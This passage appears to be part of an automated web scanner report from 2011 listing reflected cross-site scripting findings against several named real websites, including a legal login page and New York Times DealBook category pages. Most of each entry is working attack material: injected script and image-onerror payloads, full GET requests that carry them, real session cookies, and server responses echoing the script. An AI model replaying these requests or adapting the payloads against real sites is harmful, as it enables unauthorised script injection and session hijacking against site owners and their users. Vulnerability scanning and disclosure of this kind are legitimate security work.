document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=17487132ae4f'-alert(1)-'10d8742ce91&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=0&referrer=http://pepperhamilton.com/%3Fepl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4Ux
...[SNIP]...

4.90. https://ams-legal.net/support/Login.asp [userid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://ams-legal.net
Path:	/support/Login.asp

Issue detail

The value of the userid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e187d"><script>alert(1)</script>9ba0e3ea2194d98f4 was submitted in the userid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /support/Login.asp?newPassword=1&userid=e187d"><script>alert(1)</script>9ba0e3ea2194d98f4&password= HTTP/1.1
Host: ams-legal.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://ams-legal.net/support/Login.asp
Cookie: ASPSESSIONIDACBSASQD=JACKKCLBCMGCKCLIKDFBNIEK; ASPSESSIONIDSQCDBTRB=FEGHIDNBDBEOJFOALCNPEOKK; ASPSESSIONIDQSCDBTRB=HJGHIDNBKFGLLIOHFCIEAMGP

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:33:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 3024
Content-Type: text/html
Expires: Thu, 12 May 2011 12:33:05 GMT
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<title>AMS Legal Collaborator</title>
<link rel="stylesheet" type="text/css" href="Lo
...[SNIP]...
<input id="userid" name="userid" type="text" value="e187d"><script>alert(1)</script>9ba0e3ea2194d98f4" onFocus="window.status='Required field. Please enter your user ID';" />
...[SNIP]...

4.91. http://cgiwsc.enhancedsitebuilder.com/cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cgiwsc.enhancedsitebuilder.com
Path:	/cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 31754<img%20src%3da%20onerror%3dalert(1)>d4c46211706 was submitted in the REST URL parameter 3. This input was echoed as 31754<img src=a onerror=alert(1)>d4c46211706 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cgi-bin/AppLoader/AENDU0IN29GG31754<img%20src%3da%20onerror%3dalert(1)>d4c46211706/5000//20110401-102631?cc=0.7025338695384562&modified=20110401-102631 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FE10F04CB4E1537E78031D282002DCB7.3DF39F9B; rauth.session=8237970b60c26fc1be1f1dfe55f958e2

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:06:49 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript
Content-Length: 3527
P3P: CP="NOI COR CURa INT"

// ----------------------------------------------------------------------------
if (typeof(ACCESSIBLE_VERSION) == "undefined") { ACCESSIBLE_VERSION = false; }
// --------------------------------------
...[SNIP]...
</SCRIPT>");

}({
accountId : "AENDU0IN29GG31754<img src=a onerror=alert(1)>d4c46211706",
internalId : "",
customField : "20110401-102631",
server : "cgiwsc.enhancedsitebuilder.com:80",
cgiPath : "/cgi-bin/Footer",
cgiRes :
...[SNIP]...

4.92. http://cgiwsc.enhancedsitebuilder.com/cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cgiwsc.enhancedsitebuilder.com
Path:	/cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 472fe<img%20src%3da%20onerror%3dalert(1)>4d759b0f60a was submitted in the REST URL parameter 5. This input was echoed as 472fe<img src=a onerror=alert(1)>4d759b0f60a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631472fe<img%20src%3da%20onerror%3dalert(1)>4d759b0f60a?cc=0.7025338695384562&modified=20110401-102631 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FE10F04CB4E1537E78031D282002DCB7.3DF39F9B; rauth.session=8237970b60c26fc1be1f1dfe55f958e2

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:07:11 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript
Content-Length: 3551
P3P: CP="NOI COR CURa INT"

// ----------------------------------------------------------------------------
if (typeof(ACCESSIBLE_VERSION) == "undefined") { ACCESSIBLE_VERSION = false; }
// --------------------------------------
...[SNIP]...
</SCRIPT>");

}({
accountId : "AENDU0IN29GG",
internalId : "",
customField : "20110401-102631472fe<img src=a onerror=alert(1)>4d759b0f60a",
server : "cgiwsc.enhancedsitebuilder.com:80",
cgiPath : "/cgi-bin/Footer",
cgiRes : "http://cgiwsc.enhancedsitebuilder.com:80/cgi",
productId
...[SNIP]...

4.93. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/16420/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cgiwsc.enhancedsitebuilder.com
Path:	/cgix/AppLoader.cls/AENDU0IN29GG/7008/16420/language%3Aen%3Bcountry%3AUS%3B

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dbb84<img%20src%3da%20onerror%3dalert(1)>c65bf2df732 was submitted in the REST URL parameter 3. This input was echoed as dbb84<img src=a onerror=alert(1)>c65bf2df732 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cgix/AppLoader.cls/AENDU0IN29GGdbb84<img%20src%3da%20onerror%3dalert(1)>c65bf2df732/7008/16420/language%3Aen%3Bcountry%3AUS%3B?cc=0.6917730856221169 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/26401.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rauth.session=8237970b60c26fc1be1f1dfe55f958e2

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:08:10 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: must-revalidate
P3P: CP="NOI COR CURa INT"
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 82

// noop: d: [AENDU0IN29GGdbb84<img src=a onerror=alert(1)>c65bf2df732,7008,16420]

4.94. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/16420/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cgiwsc.enhancedsitebuilder.com
Path:	/cgix/AppLoader.cls/AENDU0IN29GG/7008/16420/language%3Aen%3Bcountry%3AUS%3B

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 380e8<img%20src%3da%20onerror%3dalert(1)>95c2f9acef8 was submitted in the REST URL parameter 4. This input was echoed as 380e8<img src=a onerror=alert(1)>95c2f9acef8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cgix/AppLoader.cls/AENDU0IN29GG/7008380e8<img%20src%3da%20onerror%3dalert(1)>95c2f9acef8/16420/language%3Aen%3Bcountry%3AUS%3B?cc=0.6917730856221169 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/26401.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rauth.session=8237970b60c26fc1be1f1dfe55f958e2

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:08:24 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: must-revalidate
P3P: CP="NOI COR CURa INT"
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 58

// noop: 7008380e8<img src=a onerror=alert(1)>95c2f9acef8

4.95. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cgiwsc.enhancedsitebuilder.com
Path:	/cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ceec1<img%20src%3da%20onerror%3dalert(1)>73991205269 was submitted in the REST URL parameter 3. This input was echoed as ceec1<img src=a onerror=alert(1)>73991205269 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cgix/AppLoader.cls/AENDU0IN29GGceec1<img%20src%3da%20onerror%3dalert(1)>73991205269/7008/25529/language%3Aen%3Bcountry%3AUS%3B?cc=0.3572320435196161 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:07:16 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: must-revalidate
P3P: CP="NOI COR CURa INT"
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 82

// noop: d: [AENDU0IN29GGceec1<img src=a onerror=alert(1)>73991205269,7008,25529]

4.96. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cgiwsc.enhancedsitebuilder.com
Path:	/cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a202b<img%20src%3da%20onerror%3dalert(1)>38bb7ff743d was submitted in the REST URL parameter 4. This input was echoed as a202b<img src=a onerror=alert(1)>38bb7ff743d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cgix/AppLoader.cls/AENDU0IN29GG/7008a202b<img%20src%3da%20onerror%3dalert(1)>38bb7ff743d/25529/language%3Aen%3Bcountry%3AUS%3B?cc=0.3572320435196161 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:07:29 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: must-revalidate
P3P: CP="NOI COR CURa INT"
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 58

// noop: 7008a202b<img src=a onerror=alert(1)>38bb7ff743d

4.97. http://da.newstogram.com/hg.php [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://da.newstogram.com
Path:	/hg.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 19af2<script>alert(1)</script>e16d4149e4 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hg.php?uid=71B0F849-022F-4968-92AC-BCEBD92ACB74&k=cdf74d8e9f86d84da565a74135adf113&s=http%3A//www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&r=0&q=0&e=2&cid=&callback=Newstogram.completed19af2<script>alert(1)</script>e16d4149e4 HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 12 May 2011 11:37:41 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7; expires=Fri, 11-May-2012 11:37:41 GMT; domain=.newstogram.com
Content-Length: 162

Newstogram.completed19af2<script>alert(1)</script>e16d4149e4({"Histogram":{"status":"saved","uid":"896A200B-7889-4691-9DB7-6D96659E63C7","ip":"173.193.214.243"}})

4.98. http://da.newstogram.com/hg.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://da.newstogram.com
Path:	/hg.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d7111<script>alert(1)</script>14f91b7e83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hg.php?uid=71B0F849-022F-4968-92AC-BCEBD92ACB74&k=cdf74d8e9f86d84da565a74135adf113&s=http%3A//www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&r=0&q=0&e=2&cid=&callback=Newstogram.compl/d7111<script>alert(1)</script>14f91b7e83eted HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 12 May 2011 11:37:47 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7; expires=Fri, 11-May-2012 11:37:47 GMT; domain=.newstogram.com
Content-Length: 163

Newstogram.compl/d7111<script>alert(1)</script>14f91b7e83eted({"Histogram":{"status":"saved","uid":"896A200B-7889-4691-9DB7-6D96659E63C7","ip":"173.193.214.243"}})

4.99. http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dealbook.nytimes.com
Path:	/category/main-topics/mergers-acquisitions/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7f31"><script>alert(1)</script>d4e86dd7255 was submitted in the REST URL parameter 2. This input was echoed as e7f31\"><script>alert(1)</script>d4e86dd7255 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/main-topicse7f31"><script>alert(1)</script>d4e86dd7255/mergers-acquisitions/ HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198204263:ss=1305198204263; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.2.10.1305198192; _chartbeat2=gi367p67ehp7835r; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:16:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 80654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/dealbook/category/main-topicse7f31\"><script>alert(1)</script>d4e86dd7255/mergers-acquisitions&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle
...[SNIP]...

4.100. http://dealbook.nytimes.com/category/main-topics/private-equity/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dealbook.nytimes.com
Path:	/category/main-topics/private-equity/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f84c"><script>alert(1)</script>e1de8e2eba6 was submitted in the REST URL parameter 2. This input was echoed as 5f84c\"><script>alert(1)</script>e1de8e2eba6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/main-topics5f84c"><script>alert(1)</script>e1de8e2eba6/private-equity/ HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.6.10.1305198192; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1|s*2554b=0:1; nyt-m=A61A961B774C8275E676733D3F0E8B0E&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.12.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; _chartbeat2=gi367p67ehp7835r; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305200199902:ss=1305198204263

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 80055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/dealbook/category/main-topics5f84c\"><script>alert(1)</script>e1de8e2eba6/private-equity&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left
...[SNIP]...

4.101. http://dealbook.nytimes.com/category/main-topics/venture-capital/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dealbook.nytimes.com
Path:	/category/main-topics/venture-capital/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbe83"><script>alert(1)</script>aec22f4a558 was submitted in the REST URL parameter 2. This input was echoed as dbe83\"><script>alert(1)</script>aec22f4a558 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/main-topicsdbe83"><script>alert(1)</script>aec22f4a558/venture-capital/ HTTP/1.1
Host: dealbook.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/12/takeda-in-talks-to-buy-nycomed-for-up-to-14-billion/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=FADD01C96E4F27CAA76E2D598CDA52BE&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.16.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199637269:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_11028|H07707_11029|H07707_11044|H07707_11048; news_people_toolbar=NO; __utma=30321962.1192182855.1305199567.1305199567.1305199567.1; __utmb=30321962.4.10.1305199567; __utmc=30321962; __utmz=30321962.1305199567.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; _chartbeat2=qu8esf0gap8ovzzw; adxcs=s*192f7=0:1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:27:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 80586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
